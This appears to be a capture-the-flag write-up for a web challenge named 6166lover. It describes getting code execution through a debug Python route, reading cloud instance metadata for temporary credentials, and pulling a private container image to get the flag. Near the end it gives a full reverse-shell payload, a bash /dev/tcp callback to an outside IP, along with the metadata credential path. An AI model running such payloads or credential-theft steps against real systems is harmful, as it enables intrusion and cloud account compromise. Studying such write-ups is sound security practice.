WEB-6166lover: 1. Figure out that is a Rocket application and has Cargo.tml leaked. 2. Download it and find the application name "static-files" and download the binary. 3. Run it with debug mode or Write a example application by yourself to find out the route has been registered. 4. Figure out both of the debug route have done, one is js sandbox, the another one is python "sandbox". Just think them as a black box and test them. 5. Run python code to RCE. 6. ps -ef, You will find /flag has been deleted when the instance booted. 7. Use Alibabacloud metadata to get the host instance metadata, And a worker role on it. https://help.aliyun.com/document_detail/214777.html / /meta-data/ram/security-credentials/
8. Use metadata api to get the temp credentials. 9. Use temp credentials to invoke api GetAuthorizationToken. https://help.aliyun.com/document_detail/72334.html 10. Pull image from alibabacloud image registry with username cr_temp_user and authorizationToken as its password. Image: registry.cn-hangzhou.aliyuncs.com/glzjin/6166lover
You may know these from the challenge domain, I have deployed in hangzhou of alibabacloud k8s service(ACK). And know the author name is glzjin, and the challenge name 6166lover. 11. After pull it, just run it with docker run -it registry.cn-hangzhou.aliyuncs.com/glzjin/6166lover bash, and you may get the flag on the image.
Thank you:) Just get your reverse shell like that: http://6166lover.cf8a086c34bdb47138be0b5d5b15b067a.cn-hangzhou.alicontainer.com:81/debug/wnihwi2h2i2j1no1_path_wj2mm?code=__import__('os').system('bash -c "bash -i >%26 /dev/tcp/126.96.36.199/2233 0>%261"')
And maybe you have to find out a way to fork your process that not jam this application because it's deployed on k8s with a health check.